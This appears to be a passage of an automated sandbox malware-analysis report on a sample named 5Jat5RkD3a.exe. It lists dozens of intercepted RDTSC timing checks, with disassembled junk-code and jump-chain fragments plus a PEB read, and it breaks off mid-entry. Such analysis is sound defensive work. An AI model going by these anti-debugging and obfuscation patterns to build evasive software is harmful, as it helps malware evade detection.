Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB6582 second address: BB6599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD934BC97E0h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B173D9 second address: B173EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD934C45616h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B173EA second address: B173F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB9657 second address: BB967A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C45629h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB967A second address: BB967F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB967F second address: BB96C0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD934C45618h 0x00000008 jne 00007FD934C45618h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD934C45624h 0x00000017 jmp 00007FD934C45627h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB9934 second address: BB993C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB993C second address: BB9942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB9942 second address: BB9947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB9947 second address: BB9960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD934C4561Eh 0x00000008 js 00007FD934C45616h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB9960 second address: BB997A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934BC97E1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB997A second address: BB997E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB9D7A second address: BB9D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BB9D80 second address: BB9D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC0ED3 second address: BC0EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934BC97E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC0EEF second address: BC0EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC11C8 second address: BC11CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC11CD second address: BC11F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007FD934C45618h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD934C45623h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC14C7 second address: BC14E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC14E9 second address: BC14F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC14F1 second address: BC14F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC17B7 second address: BC17BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC17BB second address: BC17E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD934BC97E1h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FD934BC97DEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC17E6 second address: BC180B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD934C45616h 0x00000008 jmp 00007FD934C45627h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC180B second address: BC1815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD934BC97D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC1815 second address: BC1819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC1819 second address: BC1823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC1823 second address: BC1840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C45629h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC1AEC second address: BC1AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC1AF5 second address: BC1AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC1AFB second address: BC1AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC22DB second address: BC22E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC2A10 second address: BC2A1A instructions: 0x00000000 rdtsc 0x00000002 je 00007FD934BC97D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BC98A4 second address: BC98A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BCBF4B second address: BCBF57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD934BC97D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BCBF57 second address: BCBF80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C45625h 0x00000009 popad 0x0000000a ja 00007FD934C45618h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BCBF80 second address: BCBF84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BCBF84 second address: BCBF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BD68B2 second address: BD68B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BD68B8 second address: BD68BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BD68BC second address: BD68F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007FD934BC97D6h 0x00000010 jmp 00007FD934BC97E5h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BD68F1 second address: BD6911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD934C45623h 0x0000000c jns 00007FD934C45616h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B0134A second address: B01386 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FD934BC97E7h 0x0000000e jmp 00007FD934BC97E8h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B01386 second address: B0138C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B0138C second address: B013AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B013AA second address: B013AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BDB0A9 second address: BDB0DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E4h 0x00000007 jmp 00007FD934BC97E9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BDB0DE second address: BDB0E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BDB0E4 second address: BDB0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BEDAA0 second address: BEDAB2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD934C45616h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BEDAB2 second address: BEDAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BEDAB6 second address: BEDAD6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD934C45616h 0x00000008 jne 00007FD934C45616h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD934C4561Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BEDAD6 second address: BEDADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BEDADB second address: BEDAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C4561Ch 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BF421B second address: BF4242 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD934BC97E2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FD934BC97F3h 0x00000010 pushad 0x00000011 jnc 00007FD934BC97D6h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BF43C3 second address: BF43C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BF43C9 second address: BF43D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: BF43D1 second address: BF43D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: BF6DCD second address: BF6DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: BFBCBE second address: BFBCC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: BFBCC7 second address: BFBCCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: BFB89C second address: BFB8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD934C45618h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007FD934C45620h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: BFD208 second address: BFD20C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: BFD20C second address: BFD216 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD934C45616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: C37E73 second address: C37E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: C37E79 second address: C37E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jmp 00007FD934C4561Fh 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: C37E96 second address: C37EC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD934BC97DBh 0x00000008 jnl 00007FD934BC97D6h 0x0000000e jbe 00007FD934BC97D6h 0x00000014 jbe 00007FD934BC97D6h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FD934BC97DAh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: C37EC5 second address: C37EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: C4A624 second address: C4A653 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FD934BC97E1h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: C4A653 second address: C4A657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D13DCC second address: D13DD8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD934BC97DEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D12D97 second address: D12D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D12D9D second address: D12DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D12DA5 second address: D12DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FD934C4564Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D12DB5 second address: D12DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D12F79 second address: D12F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D137DF second address: D13803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jo 00007FD934BC97D6h 0x00000010 jmp 00007FD934BC97E1h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D1392F second address: D13936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D16976 second address: D16980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FD934BC97D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D16980 second address: D16984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D16984 second address: D169A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007FD934BC97E4h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D169A5 second address: D16A05 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD934C45629h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edx, dword ptr [ebp+1244EDE3h] 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FD934C45618h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov edx, dword ptr [ebp+122D29EAh] 0x00000033 push 89447FBAh 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FD934C45621h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D16A05 second address: D16A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D16A0B second address: D16A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D16A0F second address: D16A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D19B48 second address: D19B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: D19B4E second address: D19B54 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 703004A second address: 7030050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030050 second address: 7030054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030054 second address: 7030058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 7030058 second address: 70300B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD934BC97E6h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 mov edx, eax 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007FD934BC97E4h 0x0000001d mov eax, dword ptr fs:[00000030h] 0x00000023 jmp 00007FD934BC97E0h 0x00000028 sub esp, 18h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 70300B4 second address: 70300B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 70300B8 second address: 70300BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe RDTSC instruction interceptor: First address: 70300BE second address: 7030168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 5321h 0x00000007 call 00007FD934C4561Eh 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 jmp 00007FD934C4561Eh 0x00000016 mov dword ptr [esp], ebx 0x00000019 jmp 00007FD934C45620h 0x0000001e mov ebx, dword ptr [eax+10h] 0x00000021 jmp 00007FD934C45620h 0x00000026 xchg eax, esi 0x00000027 jmp 00007FD934C45620h 0x0000002c push eax 0x0000002d jmp 00007FD934C4561Bh 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov eax, ebx 0x00000038 pushfd 0x00000039 jmp 00007FD934C45627h 0x0000003e adc eax, 4EB4C9EEh 0x00000044 jmp 00007FD934C45629h 0x00000049 popfd 0x0000004a popad 0x0000004b 